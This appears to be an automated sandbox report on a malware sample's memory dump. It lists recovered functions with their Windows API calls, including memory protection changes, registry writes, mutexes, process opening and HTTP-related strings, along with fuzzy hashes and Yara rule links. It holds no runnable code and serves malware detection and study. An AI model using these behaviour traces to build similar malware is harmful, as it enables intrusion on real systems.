Opcode Fuzzy Hash: 82bab8622a565772cec72fd73f991fd45cdf50493a707aaa4589c1bd15b89371
Instruction Fuzzy Hash: EDF0FE743AA204DFE7149F14DE99F9637A5AB14710B04441BF902CB3B1CB34AC80EB15

Uniqueness

Uniqueness Score: -1.00%

Function 009BD570, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C0DCC: ExpandEnvironmentStringsW.KERNEL32( Fw,00000000,00000000,00000000,77E34620,00000000,009B5FE6,%userprofile%\AppData\Local\,?,00000000,009B23FE), ref: 009C0DDD
Part of subcall function 009C0DCC: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000000,009B23FE), ref: 009C0DFA

lstrlenW.KERNEL32(00000000,00000000,761506E0,00000020,00750025,80000001), ref: 009BD5B6
lstrlenW.KERNEL32(00000008), ref: 009BD5BD
lstrlenW.KERNEL32(?,?), ref: 009BD5D9
lstrlen.KERNEL32(?,006F0070,00000000), ref: 009BD653
lstrlenW.KERNEL32(?), ref: 009BD65F
wsprintfA.USER32 ref: 009BD68D

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 082dcd554cc22c1b7f7e0479c5693496ca8c302a99b841a56c2ec7d9a2ac48b0
Instruction ID: 509c0f4a0b7aed9dec311123f4408c777773fff6b80d57168caa43c73e2e2d18
Opcode Fuzzy Hash: 082dcd554cc22c1b7f7e0479c5693496ca8c302a99b841a56c2ec7d9a2ac48b0
Instruction Fuzzy Hash: 0A417EB1905209EFCB01EFA4DD81EEE7BBDEF84314B00446AF91497222EB71E954DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D4670, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009B7D07: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,009C1117), ref: 009B7D13
Part of subcall function 009B7D07: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,009B8663,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 009B7D71
Part of subcall function 009B7D07: lstrcpy.KERNEL32(00000000,00000000), ref: 009B7D81

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 009D46BF
wsprintfA.USER32 ref: 009D46EF
GetLastError.KERNEL32 ref: 009D4764

Strings

Content-Type: application/octet-stream, xrefs: 009D46E3
`, xrefs: 009D4720

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: Content-Type: application/octet-stream$`
API String ID: 324226357-1382853987
Opcode ID: 84b6b4b1dc51619b9dd8c637a251117f2736792baf6ab18e2cd998588bb46c80
Instruction ID: 7e3b9cb98fd4b73173da377351467925553eaf55c43c762f32603928f5f8e4da
Opcode Fuzzy Hash: 84b6b4b1dc51619b9dd8c637a251117f2736792baf6ab18e2cd998588bb46c80
Instruction Fuzzy Hash: D131E071540209AFCF11EF55DC85FAB7BACEF90350F10802AF916972A1EB30E958DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C39D7, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009CB01E: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 009CB02A
Part of subcall function 009CB01E: SetLastError.KERNEL32(000000B7,?,009C39EB,?,?,00000000,?,?,?), ref: 009CB03B

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 009C3A0B
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 009C3AE3

Part of subcall function 009B3828: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 009B3842
Part of subcall function 009B3828: CreateWaitableTimerA.KERNEL32(009DE0D4,00000003,?), ref: 009B385F
Part of subcall function 009B3828: GetLastError.KERNEL32(?,?,009C3A3F,?,?,?,00000000,?,?,?), ref: 009B3870
Part of subcall function 009B3828: GetSystemTimeAsFileTime.KERNEL32(?,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38B0
Part of subcall function 009B3828: SetWaitableTimer.KERNEL32(00000000,009C3A3F,00000000,00000000,00000000,00000000,?,?,009C3A3F,?), ref: 009B38CF
Part of subcall function 009B3828: HeapFree.KERNEL32(00000000,009C3A3F,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38E5

GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 009C3ACC
ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 009C3AD5

Part of subcall function 009CB01E: CreateMutexA.KERNEL32(009DE0D4,00000000,?,?,009C39EB,?,?,00000000,?,?,?), ref: 009CB04E

GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 009C3AF0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: d1b5a9df526a798833be42d5f3084956abafbd1cfe8eceacac5c5bb25894087c
Instruction ID: effe73d079a2b8e8a411f8b03a3b8d6739e234d8da618be092332f8364b8d3dd
Opcode Fuzzy Hash: d1b5a9df526a798833be42d5f3084956abafbd1cfe8eceacac5c5bb25894087c
Instruction Fuzzy Hash: EC31E470A56205AFCB10EF79DC41DAE7BFEEB84310B14842AF402D7261DA71C991DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D220F, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 009D2228

Part of subcall function 009B3CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,009CF65A), ref: 009B3CCA

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,009C3EF5,00000000), ref: 009D226A
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 009D22BC
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,009C3EF5,00000000), ref: 009D22D5

Part of subcall function 009D45FE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 009D461F
Part of subcall function 009D45FE: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,009D225B,00000000,00000000,00000000,00000001,?,00000000), ref: 009D4662

GetLastError.KERNEL32(?,00000000,009C3EF5,00000000), ref: 009D230D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: bcb3de4f04bedf6ac88f8fa61e63c43707f69c526dd6762a067f85dc1927c354
Instruction ID: a97b167b550b8f8dc159c35352f6fb932ceac02eda54ef9e67596565a504d8b1
Opcode Fuzzy Hash: bcb3de4f04bedf6ac88f8fa61e63c43707f69c526dd6762a067f85dc1927c354
Instruction Fuzzy Hash: A5316E71A85208AFDB15DF98CD40BAEBBB8EF18750F104457F905A7251D7749A80EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C8291, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 009BC71D: lstrlen.KERNEL32(00000000,00000000,?,74785520,009C82A5,00000000,00000000,00000000,74785520,?,00000022,00000000,00000000,00000000,?,?), ref: 009BC729

RtlEnterCriticalSection.NTDLL(009DE268), ref: 009C82BB
RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009C82CE
GetSystemTimeAsFileTime.KERNEL32(?), ref: 009C82DF
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 009C834A
InterlockedIncrement.KERNEL32(009DE27C), ref: 009C8361

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: 38caf352d4bc813a443fe67a64081d1f7b3d6685e114775df7b45c7f808be858
Instruction ID: db0b708b5c49f211a1035540bf85c28a178ad1300977e3f98691a063ecb9f8a8
Opcode Fuzzy Hash: 38caf352d4bc813a443fe67a64081d1f7b3d6685e114775df7b45c7f808be858
Instruction Fuzzy Hash: 3F31DF319097459FC721DF68C848E6BB7E8FB45761B048A2EF9A583260CB30DC51DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009B7365, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,74785520,?,?,009C1386,00000000,?,?), ref: 009B7383
GetFileSize.KERNEL32(00000000,00000000,?,?,009C1386,00000000,?,?,?,?,00000000,009B1589,?,00000000,?,009C5B4A), ref: 009B7393
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,009C1386,00000000,?,?,?,?,00000000,009B1589), ref: 009B73BF
GetLastError.KERNEL32(?,?,009C1386,00000000,?,?,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?,00000001), ref: 009B73E4
CloseHandle.KERNEL32(000000FF,?,?,009C1386,00000000,?,?,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?), ref: 009B73F5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: b6c246e9f79917201c7cf49c36b8b18d9bfd39996475b5ce8fc2c71cc861cb8c
Instruction ID: 19628b3ec9e544543c678e1b63fa70dd22871d7001f4ca941eee2e70cac6f30a
Opcode Fuzzy Hash: b6c246e9f79917201c7cf49c36b8b18d9bfd39996475b5ce8fc2c71cc861cb8c
Instruction Fuzzy Hash: DA11D572108215FFDB201FA8ED84EEEBBADDB84370F11462AFD1197190D6709C80A6A0

Uniqueness

Uniqueness Score: -1.00%

Function 009D17F1, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,64F16420,64F16420,?,009BB0C6,?,?,?,00000000,?,?,00000001), ref: 009D1802
StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,64F16420,64F16420,?,009BB0C6,?,?,?,00000000,?,?,00000001), ref: 009D181B
StrTrimA.SHLWAPI(?,20000920,?,00000000,64F16420,64F16420,?,009BB0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 009D1843
StrTrimA.SHLWAPI(00000000,20000920,?,00000000,64F16420,64F16420,?,009BB0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 009D1852
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,64F16420,64F16420,?,009BB0C6,?,?,?), ref: 009D1889

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 82a23c120d127df7cff0bc261c7a74d765e43f1de8e7fc31972dca16bf583ade
Instruction ID: fe28addb7d569eb43cd6c07d6ed64b0779a2ce69d8fa839e679c0e0f4d22d64f
Opcode Fuzzy Hash: 82a23c120d127df7cff0bc261c7a74d765e43f1de8e7fc31972dca16bf583ade
Instruction Fuzzy Hash: 6F119333295205BBD721DB99DC84FAB3BADEB44790F144023F6049B251DBB0DC80E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009CFD52, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,00000000,?,?,00000000,00000000,?,009BA4D6,00000000,009B585F,00000000,009DDEAC,00000008), ref: 009CFD89
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,009BA4D6,00000000,009B585F,00000000,009DDEAC,00000008,00000003), ref: 009CFDB9
RtlEnterCriticalSection.NTDLL(009DE240), ref: 009CFDC8
RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009CFDE6
GetLastError.KERNEL32(?,009BA4D6,00000000,009B585F,00000000,009DDEAC,00000008,00000003), ref: 009CFDF6

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 816ab20b2c3fb1cbac1a549941d49d13dade7466089b8f282616aee0f3f0751d
Instruction ID: aaab7c7a0e6636c2c0730ba156eeccecc111c9dae715694ef1151447b5a4f026
Opcode Fuzzy Hash: 816ab20b2c3fb1cbac1a549941d49d13dade7466089b8f282616aee0f3f0751d
Instruction Fuzzy Hash: BF2107B5A41B01AFD721DFA9C980E4ABBF8FB08310B00852AEA56D7761D770F944DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009C34B4, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 009C34E2
GetLastError.KERNEL32 ref: 009C3505
WaitForSingleObject.KERNEL32(?,000000FF), ref: 009C3518
GetLastError.KERNEL32 ref: 009C3523
HeapFree.KERNEL32(00000000,00000000), ref: 009C356B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: 03f8cfcc118a439b815ec1d525b402b927032dc3b74954a28bae4292232e1998
Instruction ID: f3806b7db4484f8bb635354356670caf04eb42bf3bd2755797d364ced98e09b6
Opcode Fuzzy Hash: 03f8cfcc118a439b815ec1d525b402b927032dc3b74954a28bae4292232e1998
Instruction Fuzzy Hash: 0C219270954284EBEB219F58DC8CF5A7BB9FB00314F60C41DF146965A1C775AEC4DB11

Uniqueness

Uniqueness Score: -1.00%

Function 009B3F5D, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000057,009B20D2), ref: 009B3F71
memcpy.NTDLL(00000000,?,009B20D2,009B20D2,-00000005,?,009B488A,Scr,00000000,-00000005,00000001,?,?,?,009B6516,00000000), ref: 009B3F9A
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,009B20D2), ref: 009B3FC3
RegSetValueExA.ADVAPI32(009B20D2,?,00000000,00000003,00000000,00000000,-00000005,?,009B488A,Scr,00000000,-00000005,00000001), ref: 009B3FE3
RegCloseKey.ADVAPI32(009B20D2,?,009B488A,Scr,00000000,-00000005,00000001,?,?,?,009B6516,00000000,Scr,?,?,747DF710), ref: 009B3FEE

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: ff05375b2d98290abdbcadd13a5058bbd0e6f8533595f67551b635fc372d64d7
Instruction ID: 00e79ea6abec5ef5a5c8080e28ee963b5161fba2deffa66aa72774517208b523
Opcode Fuzzy Hash: ff05375b2d98290abdbcadd13a5058bbd0e6f8533595f67551b635fc372d64d7
Instruction Fuzzy Hash: 25119176644109BBEB11AF64AD45EFA777DEB44350F008026FD01A21A0D7768E609761

Uniqueness

Uniqueness Score: -1.00%

Function 009BDD8D, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(009C6602,?,?,?,?,00000008,009C6602,00000000,?), ref: 009BDDAA
memcpy.NTDLL(009C6602,?,00000009,?,?,?,?,00000008,009C6602,00000000,?), ref: 009BDDCC
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 009BDDE4
lstrlenW.KERNEL32(00000000,00000001,009C6602,?,?,?,?,?,?,?,00000008,009C6602,00000000,?), ref: 009BDE04
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,009C6602,00000000,?), ref: 009BDE29

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: cf46a39b5ca7866f26386f964acaf05aa7607c0f5600fef704c2c900d91332d3
Instruction ID: d828bf6631305f0d5421eda1a7ee3bc36464a79d7810059329a7b5135f529dbb
Opcode Fuzzy Hash: cf46a39b5ca7866f26386f964acaf05aa7607c0f5600fef704c2c900d91332d3
Instruction Fuzzy Hash: D411C83AD56208BBCB109FA4DC49FDE7FBCAF48310F048456F609D6291E670D648DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009CECB1, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,009D6C86,74785520,009B4BBD,?,?,?,009B15E5,?,?,00000000,?,009C5B4A,?,00000001), ref: 009CECBB

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

lstrcpy.KERNEL32(00000000,?), ref: 009CECDF
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,009B15E5,?,?,00000000,?,009C5B4A,?,00000001), ref: 009CECE6
lstrcpy.KERNEL32(00000000,4C003436), ref: 009CED2E
lstrcat.KERNEL32(00000000,00000001), ref: 009CED3D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 9ef85391df1a4c5d5843c2b570c838296710a6dfe5ad9c4b48cc3a6953eb12ef
Instruction ID: 7589b92ee32e56f1a8c664f281a09dd679058f089b141a8a64899eaaf10aeb02
Opcode Fuzzy Hash: 9ef85391df1a4c5d5843c2b570c838296710a6dfe5ad9c4b48cc3a6953eb12ef
Instruction Fuzzy Hash: 3911A372659201ABD3209B69DC89F6B77ECAF94740F08042EF60AC7190DB34D988D732

Uniqueness

Uniqueness Score: -1.00%

Function 009BAA89, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009BC71D: lstrlen.KERNEL32(00000000,00000000,?,74785520,009C82A5,00000000,00000000,00000000,74785520,?,00000022,00000000,00000000,00000000,?,?), ref: 009BC729

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009BAAB2
memcpy.NTDLL(00000000,?,?), ref: 009BAAC5
RtlEnterCriticalSection.NTDLL(009DE268), ref: 009BAAD6
RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009BAAEB
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 009BAB23

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 1c3e95e0031801cedd6e1ba92aeb47c26a462bddc90b5e12d055e1d3ab5e7516
Instruction ID: 6e7467076ff89c2e00374560490ab27d13a1b965e94d97d72820b77d3cf74502
Opcode Fuzzy Hash: 1c3e95e0031801cedd6e1ba92aeb47c26a462bddc90b5e12d055e1d3ab5e7516
Instruction Fuzzy Hash: 0A11E97555A310AFC3256F24EC84DAB7B6DFB86321705453FF52293211CA315C45EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009CFE0E, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 009CFE2E
GetModuleHandleA.KERNEL32 ref: 009CFE3C
LoadLibraryExW.KERNEL32(?,?,?), ref: 009CFE49
GetModuleHandleA.KERNEL32 ref: 009CFE60
GetModuleHandleA.KERNEL32 ref: 009CFE6C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 892f1c4c77e59e2ec282cb055721bc7c8a676394a0f08820dbf7b071ff1134ba
Instruction ID: 73fd214eee3f67d8a9edeef1cf08a4a2ea63df817d888b1c66e37b9e73303e50
Opcode Fuzzy Hash: 892f1c4c77e59e2ec282cb055721bc7c8a676394a0f08820dbf7b071ff1134ba
Instruction Fuzzy Hash: 2D01623165A2159BDB015F6AEC50E567FAEEB14360304403BF914C3171DBB1DC51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C2AC4, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(009DE240), ref: 009C2ACF
RtlLeaveCriticalSection.NTDLL(009DE240), ref: 009C2AE0
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,009C0AA0,009DD7A0,747857B0,00000000,009C1E50,0000000C,00000000,?,0000000C,00000000), ref: 009C2AF7
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,009C0AA0,009DD7A0,747857B0,00000000,009C1E50,0000000C,00000000,?,0000000C,00000000), ref: 009C2B11
GetLastError.KERNEL32(?,?,009C0AA0,009DD7A0,747857B0,00000000,009C1E50,0000000C,00000000,?,0000000C,00000000,WININET.dll), ref: 009C2B1E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: e422029ca6b9405ed639c4e61b11ee1d14a8af96170417a8dbfa742b12140642
Instruction ID: d8f1061f0d4d9342e0733670b67259a63b8ca80ec448468cf0f8e5f6c189cee4
Opcode Fuzzy Hash: e422029ca6b9405ed639c4e61b11ee1d14a8af96170417a8dbfa742b12140642
Instruction Fuzzy Hash: 63018B75640304AFD7219F29DC00E6AB7F9EF85320B10852AEA56933A1CB30ED059B20

Uniqueness

Uniqueness Score: -1.00%

Function 009C4E2B, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 009C51FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 009C5202

GetCurrentThreadId.KERNEL32 ref: 009C4E43
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009C4E53
CloseHandle.KERNEL32(00000000), ref: 009C4E5C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,009D0B37), ref: 009C4E7A
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,009D0B37), ref: 009C4E87

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: 26832ceddb1cc36953a80f0ce353786078e695122a9afa4b3164aa6ae261da4c
Instruction ID: ff6871f2c83ed61ba2afb28c63b67b7d1c1b08816b013481e773b292369eedd2
Opcode Fuzzy Hash: 26832ceddb1cc36953a80f0ce353786078e695122a9afa4b3164aa6ae261da4c
Instruction Fuzzy Hash: ACF03C71A15B04ABD630AB75DC48F97B7ECBF44710F050A1DB681925A1DB34F888CA21

Uniqueness

Uniqueness Score: -1.00%

Function 009C8B88, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,009BA08D,?), ref: 009C8B90
GetVersion.KERNEL32 ref: 009C8B9F
GetCurrentProcessId.KERNEL32 ref: 009C8BAE
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 009C8BCB
GetLastError.KERNEL32 ref: 009C8BEA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: adeb8419d8c5679b1c665ad9f8abca274dde62bd4500b617c681c5d9882abf5c
Instruction ID: 4d82365e58984eed9a64aea887f4ff8e208edb52f7a026c335a0465abb2799c5
Opcode Fuzzy Hash: adeb8419d8c5679b1c665ad9f8abca274dde62bd4500b617c681c5d9882abf5c
Instruction Fuzzy Hash: 6AF01DB4AEE305AED350AF25EC09B273B64B704741F10491BE116D91E0DFB088C5EB1A

Uniqueness

Uniqueness Score: -1.00%

Function 009C2692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,?), ref: 009C2775
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,009B5E99), ref: 009C27E7
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 009C27F8

Part of subcall function 009C0158: RtlLeaveCriticalSection.NTDLL(?), ref: 009C01D5

Strings

HTTP/1.1 404 Not Found, xrefs: 009C276D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: 10dfe365daeeb668440df9bb4b04d6081513769e98b40386091e1b7165648e34
Instruction ID: 649d4f24b04bd05f29022f50ff15533069d9d1c9e95c69da9a6720fabc9b9423
Opcode Fuzzy Hash: 10dfe365daeeb668440df9bb4b04d6081513769e98b40386091e1b7165648e34
Instruction Fuzzy Hash: A361BD34A00606FFEB11DF68CA81FA6B7A9BF48340F50842DE90496A51E771ED20DB82

Uniqueness

Uniqueness Score: -1.00%

Function 009B91C1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 009B9217, 009B9224

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: eae00fb6d7585144f8337d1b0dfef33320191d0b85c34c14189b3db3fdd02003
Instruction ID: 7c4bcb921aa020aee4e6a60560f2aa3c98134c243f0feda77d4dc7f5696b0cf8
Opcode Fuzzy Hash: eae00fb6d7585144f8337d1b0dfef33320191d0b85c34c14189b3db3fdd02003
Instruction Fuzzy Hash: 0531AFB1558305BFDB119F50CD84DABBFADFB843A8F00481AFA9591061C7318D54EB62

Uniqueness

Uniqueness Score: -1.00%

Function 009BCD69, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 009BCD9D
RtlFreeAnsiString.NTDLL(?), ref: 009BCE1D
WaitForSingleObject.KERNEL32(00000000), ref: 009BCE2A

Strings

?@, xrefs: 009BCE05

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: f32691a353e82c27a34f0d5130f0b5a725c5b75b2ede94de319f8057e2e29fdb
Instruction ID: 433e10a114bdcef191016afaf6fc9046d415bdc475571ded8ab8afaef68a2e53
Opcode Fuzzy Hash: f32691a353e82c27a34f0d5130f0b5a725c5b75b2ede94de319f8057e2e29fdb
Instruction Fuzzy Hash: 9D2101B6508600EBC724DF65DA898ABB3ADFB84320B044C2BF581C3161DB30DC94DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 009C526B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 009C5281
wsprintfA.USER32 ref: 009C52C2
GetModuleHandleA.KERNEL32(00000000), ref: 009C52D4

Strings

t, xrefs: 009C52D4

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CountHandleModuleTickwsprintf
String ID: t
API String ID: 218054273-2238339752
